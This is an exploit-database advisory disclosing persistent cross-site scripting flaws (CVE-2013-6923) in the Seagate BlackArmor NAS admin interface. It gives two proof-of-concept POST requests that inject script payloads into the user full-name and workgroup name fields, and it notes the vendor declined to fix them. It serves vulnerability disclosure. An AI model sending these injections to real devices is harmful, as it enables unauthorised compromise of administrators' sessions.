Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities

EDB-ID:

30727




Platform:

Hardware

Date:

2014-01-06


# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site
Scripting Vulnerabilities

# Google Dork: N/A

# Date: 04-01-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage:  <http://www.seagate.com/> http://www.seagate.com/

# Software Link:
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
>
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

# Version: sg2000-2000.1331

# Tested on: N/A

# CVE : CVE-2013-6923

#

## Description:

#

# When adding a user to the device, it is possible to enter a full name.
This input field does not

# sanitize its input and it is possible to enter any payload which will get
executed upon reload.

#

# The workgroup configuration is also vulnerable to persistent XSS. The Work
Group name input 
# field does not sanitize its input.

#
# This vulnerability was reported to Seagate in September 2013, they stated
that this will not be fixed. 

#

## Proof of Concept #1:

# 

# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
# Parameters:

#

# index = 2
# fullname = <script>alert(1);</script>
# submit = Submit

# 

#

## Proof of Concept #2:

#

# POST: http(s)://<url |
ip>/admin/network_workgroup_domain.php?lang=en&gi=n003

# Parameter:

#

# workname = "><input onmouseover=prompt(1) >